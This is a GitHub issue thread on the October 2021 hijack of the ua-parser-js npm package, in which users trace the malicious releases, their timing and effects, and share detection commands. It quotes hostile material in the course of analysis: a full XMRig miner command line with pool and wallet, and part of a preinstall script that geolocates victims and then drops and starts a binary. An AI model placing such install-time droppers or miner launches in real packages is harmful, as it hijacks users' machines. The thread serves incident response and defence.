faisalman / ua-parser-js

UAParser.js - The Essential Web Development Tool for User-Agent Detection.
https://uaparser.dev/
GNU Affero General Public License v3.0

Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js #536

Closed SuperOleg39 closed 10 months ago

SuperOleg39 commented 2 years ago

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or is it not safe?

Second question - Will you create a new package, or try to remove the hijacked versions and continue updating this package?

DanielRuf commented 2 years ago

@faisalman did you enforce 2FA for your npm account and for releases there too?

If not, please do so. I also think this library, which is used by many, should be in an org account on GitHub, not a personal one.

The current truck factor is probably quite low and there should be more than one maintainer. If you need help with the migration to an org, I can help.

Marenthyu commented 2 years ago

Does anybody still know when the malicious versions were released exactly? This would help to check whether anyone ran an npm install that fetched the malicious version during that time. Thanks for the help.

It was quite well summarized by @mensfeld above: https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949936808

TL;DR: The first compromised version was released on Oct 22 '21 at 14:15 CET, with the first fixed version being released on Oct 22 '21 at 18:16 CET.

gugu commented 2 years ago

Does someone have the malware Linux binary? I want to disassemble it to understand what it can do.

jackadamson commented 2 years ago

Does someone have the malware Linux binary? I want to disassemble it to understand what it can do.

I don't have a copy, but the CLI arguments that are passed seem to match those given to the XMRig monero coin miner.

./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &

Source: https://xmrig.com/docs/miner/command-line-options

gugu commented 2 years ago

This script does not work for Ukraine, Russia, Belarus, Kazakhstan. Usually it means it is someone from our countries.

DanielRuf commented 2 years ago

@gugu maybe you can analyze it with hybrid-analysis.com which has also Ubuntu / Linux VMs

gugu commented 2 years ago

I don't have a copy, but the CLI arguments that are passed seem to match those given to the XMRig monero coin miner.

We cannot be sure, as it can bundle another script.

@gugu maybe you can analyze it with hybrid-analysis.com which has also Ubuntu / Linux VMs

We need to get the file; currently it is unavailable. If we can get at least a checksum of it, we can be sure it is only a Monero miner.

broofa commented 2 years ago

@faisalman Please publish a post-mortem (once the dust has settled) that outlines what happened and what you could have done differently to prevent this, so we can learn from this experience.

DanielRuf commented 2 years ago

@gugu hm, seems the URLs are generally down for everyone. I've checked all other malware databases and did not find a sample for this URL (for the Linux version).

https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29#d2h-656491

I'll ask if someone from Sonatype has any IOCs including hashes or samples.

jabali2004 commented 2 years ago

@gugu I had the binary installed yesterday. I could see if I can find it in my pnpm store.

ConfusedAlex commented 2 years ago

Linux noob here. Yesterday I installed the npm and I think I am affected by the malware. Is there any way to check if I am affected, and is there a way to get rid of the virus?

gugu commented 2 years ago

Is there any way to check if I am affected, and is there a way to get rid of the virus?

pgrep jsextension

It will show if the program is running now.

jabali2004 commented 2 years ago

Nope, no Linux binary left on my development VM.

AleksandrHovhannisyan commented 2 years ago

I noticed that the PID of jsextension keeps changing. Anybody know how to figure out what parent process launched it? I'm unable to kill it.

kelset commented 2 years ago

Hey folks - thanks for all the collective work in trying to get this sorted!

@faisalman one piece of feedback, before everything else: can you edit the first post (the top message) with some clearer information about this problem? It would help everyone who lands here to get a better understanding of the situation.


Now, can I ask you all for help? I'm really not great at CLI across OSs and node package managers - could you help me out in finding the right commands per each system and per each package manager to find/verify if someone had installed the affected version and/or which version of ua-parser-js they might have installed on their machine?

I would imagine that each package manager has a global cache of sort where it keeps a local copy or at least a reference of every package ever installed? (or maybe I'm naive? 😅)

Here's a handy markdown table to fill:

| OS      | npm command | yarn command | pnpm command | other package manager |
| ------- | :---------: | -----------: | -----------: | --------------------: |
| Windows |  <add me>   |     <add me> |     <add me> |              <add me> |
| Linux   |  <add me>   |     <add me> |     <add me> |              <add me> |
| macOS   |  <add me>   |     <add me> |     <add me> |              <add me> |

Aside from this, I seem to understand that there's also a command you can run to see if the malware is currently running, am I right @tjhorner (sorry for mentioning you, your comment is very good and detailed so I'm betting you have knowledge in this >) )? Could anyone post those too?


Small edit: for yarn:

yarn cache list --pattern ua-parser-js

ahmetbicer commented 2 years ago

@AleksandrHovhannisyan if you are checking with ps -aux | grep jsextension the process that shows up is the grep itself. You can check with pgrep jsextension to see if any PID returns.

andrei-bacs commented 2 years ago

@AleksandrHovhannisyan you can use pstree on Linux or tasklist on Windows. Do you happen to have the Linux binary? If so, can you please share an MD5 or SHA256 of it?

gugu commented 2 years ago

I noticed that the PID of jsextension keeps changing. Anybody know how to figure out what parent process launched it? I'm unable to kill it.

Does kill -9 help? After you stop it, please don't remove it; we need a checksum of it to make sure it is only a miner and does not steal data.

AleksandrHovhannisyan commented 2 years ago

@ahmetbicer Ah, okay, pgrep jsextension doesn't show anything. ps -aux | grep jsextension shows this, and I was panicking thinking it's the miner:

aleks     6781  0.0  0.0  14812  1192 tty2     S    12:55   0:00 grep --color=auto jsextension

Apparently I don't know what I'm doing, lol 😅 Apologies for the confusion!

andrei-bacs commented 2 years ago

@kelset MacOS is not affected. The preinstall.js script skips this platform (i.e. does not download a binary on it) and the preinstall.sh script also skips all Linux machines that are located in: Russia, Ukraine, Belarus, Kazakhstan.

You can notice these lines in the preinstall.sh script:

IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU|UA|BY|KZ')
if [ -z "$IP" ]
... drops the binary here and starts it ...
fi

DanielRuf commented 2 years ago

Sonatype and Bleepingcomputer analysed the samples:

https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/

Turns out the hijacked ua-parser-js NPM package not only mines cryptocurrency on Windows, Linux machines but the dropped DLL also steals passwords for FTP clients, VNC, messaging apps, email clients, browsers, and many apps. "From copies of the malicious NPMs shared with BleepingComputer by Sonatype, we can better understand the attack."

So the dll file is actually a password stealer. The jsextension file is probably just the original miner.

The article contains a list of targeted applications and shows code, which accesses the credential manager of Windows.

scottaw66 commented 2 years ago

@faisalman Have you been able to get npm to take steps wrt your npm account security? Any idea how they got in in the first place?

nathanawmk commented 2 years ago

How did this happen? A post mortem is sorely needed. We need to avoid this from occurring again. Believe that the active use of npm audit and/or Snyk and/or Palo Alto Prisma Cloud / The Update Framework (TUF) / Sonatype would have deterred this from happening in the first place?

channa-med commented 2 years ago

When were these compromised versions added? I can't find the history since they have been removed.

gugu commented 2 years ago

How did this happen? A post mortem is sorely needed. We need to avoid this from occurring again. Believe that the active use of npm audit and/or Snyk and/or Palo Alto Prisma Cloud / The Update Framework (TUF) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think the author has already enabled 2FA; it prevents things like this from happening in the future.

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can be hacked. Especially if a person thinks otherwise.

ljharb commented 2 years ago

try npm show ua-parser-js time

PrivateGER commented 2 years ago

How did this happen? A post mortem is sorely needed. We need to avoid this from occurring again. Believe that the active use of npm audit and/or Snyk and/or Palo Alto Prisma Cloud / The Update Framework (TUF) would have deterred this from happening in the first place?

npm audit does absolutely nothing to prevent security issues, it only displays security advisories already published. The only way to defend against this would be an antivirus on either your or npm's side.

tanelikaivola commented 2 years ago

When were the affected versions published? Now that they've been pulled, neither npm nor GitHub have any information about them at all.

ljharb commented 2 years ago

@tanelikaivola absolutely npm does, see https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950202924

igor-sysoev commented 2 years ago

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

DanielRuf commented 2 years ago

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

The affected version was published on the 22nd of October (Friday) and removed a few hours later on the same day.

igor-sysoev commented 2 years ago

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

The affected version was published on the 22nd of October (Friday) and removed a few hours later on the same day.

Right. I stupidly had my Windows Defender off and I started having performance issues right about that time. Windows Defender scan doesn't show anything anymore, but I don't really know how to proceed besides the usual password change and stuff. Any advice on how to restore my potentially compromised PC back to normal?

DanielRuf commented 2 years ago

I think the author has already enabled 2FA; it prevents things like this from happening in the future.

There are two settings at npmjs. One 2FA setting for the account itself and one 2FA setting for publishing packages (which is not enforced by default afaik) - per package.

See this:

[Screenshot 2021-10-23 23:35:20]

So normally you can publish a package with a stolen token afaik.

y4my4my4m commented 2 years ago

Is this only dangerous when installed globally? I have hundreds of projects with local packages installed, not sure how I'd scan through them all easily...

(i understand this only happened a few days ago so only recently updated ones should be a concern...but still...)

DanielRuf commented 2 years ago

Is this only dangerous when installed globally?

No, it makes no difference if locally or globally installed - it is the same computer. Unless you have used npm i --ignore-scripts.

DanielRuf commented 2 years ago

Is this only dangerous when installed globally?

Generally there was just a small window on Friday (22nd of October) when the malicious versions were released, and only Linux and Windows seem to be targeted. If you installed before this date, then you are probably safe. Same for MacOS. See also the previous comments and the diff links.

ljharb commented 2 years ago

@DanielRuf https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950181260 says Macs aren't affected.

tanelikaivola commented 2 years ago

Thanks @ljharb!

Here's the information so it's more easily available.

So the packages were available maximum of about 4 hours? (possibly even less?)

'0.7.29': '2021-10-22T12:15:21.378Z',
'0.7.30': '2021-10-22T16:16:08.807Z',

'0.8.0': '2021-10-22T12:16:06.877Z',
'0.8.1': '2021-10-22T16:23:53.062Z',

'1.0.0': '2021-10-22T12:16:19.726Z',
'1.0.1': '2021-10-22T16:26:19.004Z',

DanielRuf commented 2 years ago

@DanielRuf #536 (comment) says Macs aren't affected.

That's what I wrote, MacOS is not affected ;-) I wanted to write "Windows" but wrote "MacOS" by accident.

ghost commented 2 years ago

Am I affected if I had installed a package that used this library from pnpm? (in WSL2)

RandomYser commented 2 years ago

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

nathanawmk commented 2 years ago

How did this happen? A post mortem is sorely needed. We need to avoid this from occurring again. Believe that the active use of npm audit and/or Snyk and/or Palo Alto Prisma Cloud / The Update Framework (TUF) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think the author has already enabled 2FA; it prevents things like this from happening in the future.

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can be hacked. Especially if a person thinks otherwise.

Agreed. This can happen to anyone, including myself

nathanawmk commented 2 years ago

How did this happen? A post mortem is sorely needed. We need to avoid this from occurring again. Believe that the active use of npm audit and/or Snyk and/or Palo Alto Prisma Cloud / The Update Framework (TUF) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think the author has already enabled 2FA; it prevents things like this from happening in the future.

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can be hacked. Especially if a person thinks otherwise.

Sure, 2FA is an absolute requirement, and EDR for every developer. Are there any further guardrails that npm or GitHub can institute so similar incidents can be prevented?

tanelikaivola commented 2 years ago

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

@RandomYser, is there even a way to list every one of those ~1200 dependents? You can get about 395 of those, but after that npmjs doesn't let you. More specifically, npmjs, ?offset=360 is the maximum, here npmjs, last available page

RandomYser commented 2 years ago

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

@RandomYser, is there even a way to list every one of those ~1200 dependents? You can get about 395 of those, but after that npmjs doesn't let you. More specifically, npmjs, ?offset=360 is the maximum, here npmjs, last available page

Searching the interwebs a little bit, this might help: https://www.npmjs.com/package/package-dependents

DanielRuf commented 2 years ago

Sure, 2FA is an absolute requirement, and EDR for every developer. Are there any further guardrails that npm or GitHub can institute so similar incidents can be prevented?

@nathanawmk yes, npm i --ignore-scripts which should be the default imho, cc @ljharb

Same for 2FA requirement for releases. See my last comments and the screenshot.

This and other cases are good reasons why I use GitHub Codespaces now and removed all dev related setups from my laptops.

DanielRuf commented 2 years ago

@sharedrory you can search through the installed packages.

Also the problematic versions were only available for about 4 hours: https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950222787

raxhvl commented 2 years ago

Overview

The attacker tampered with the installation script so that the package would automatically execute what appears to be a crypto miner during installation.

[Screenshot 2021-10-24 17:17:44]

MacOS

MacOS users seem not to be affected, as the script just skips this OS.

[Screenshot 2021-10-24 15:14:02]

Linux

On Linux it runs the following script:

[Screenshot 2021-10-24 15:12:55]

Indicators of compromise (IOC) for Linux users:

Anon-Exploiter commented 2 years ago

Shitty one-liner to detect it system-wide as a string:

find / -name "package-lock.json" -exec grep --color -EHni "ua-parser-js" {} \; 2>/dev/null

To detect if the vulnerable version is in your system:

find / -name "package-lock.json" -exec grep --color -EHni "ua-parser-js-(0.7.29|0.8.0|1.0.0)" {} \; 2>/dev/null

rostockahoi commented 2 years ago

It seems that version 0.7.29 vanished and there is a 0.7.30. Is it safe to update from "ua-parser-js": "^0.7.28" now?